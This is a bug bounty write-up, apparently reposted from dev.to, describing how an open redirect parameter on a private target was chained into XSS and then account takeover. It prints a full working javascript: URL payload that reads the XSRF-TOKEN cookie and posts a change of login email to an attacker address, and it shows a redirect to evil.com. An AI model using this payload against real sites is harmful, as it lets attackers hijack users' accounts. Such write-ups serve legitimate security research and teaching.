Chaining Open Redirect with XSS to Account Takeover

Chaining Open Redirect with XSS to Account Takeover

source cover : dev.to/sam5epi0l

Hello everyone, I hope you are well. In this article I will show you how I escalated XSS to Account Takeover. Since the target is private, let’s call as target.com.

The Open Redirect

I started testing target and register the account, while register, I can create my own subdomain for the organization like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found the url endpoint like this https://ownsubdomain.target.com/overview/?ccpa_redirect=

URL Endpoint

Then i tried to open redirect like this ownsubdomain.target.com/overview/?ccpa_redi..evil.com and it was successfully, i was redirected to evil.com page :D. Then I tried to use this XSS payload javascript:alert(1); and opened in the browser, and yeah the XSS popped up.

Chaining the XSS to Account Takeover

After that, I didn’t immediately report the bug. I’m thinking of upgrading this XSS to a more severe impact. Shortly, I found a form that can change my email, like this

Form Change Email

But there was an CSRF-TOKEN protection. Then I remember that I had read a writeup about Chaining the XSS to severe impact. So, I make the payload for change my email and bypassed the CSRF-TOKEN protection with XSS vulnerability. The payload was like this :

javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)\[1\];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');

So when user visited this URL in browser https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); the alert will popped up and the email will changed.

Alert popped up

Email changed successfully

Then I reported this to the program, but sadly I got duplicate D:

I hope you are enjoyed my article, keep learning and stay safe.

Tips :

Don’t be quick to report any bugs you find, always look for more severe impacts.

Reference :

https://melotover.medium.com/how-i-leveraged-xss-to-make-privilege-escalation-to-be-super-admin-e120b6090451

Follow me on twitter :

https://twitter.com/0xrdnzx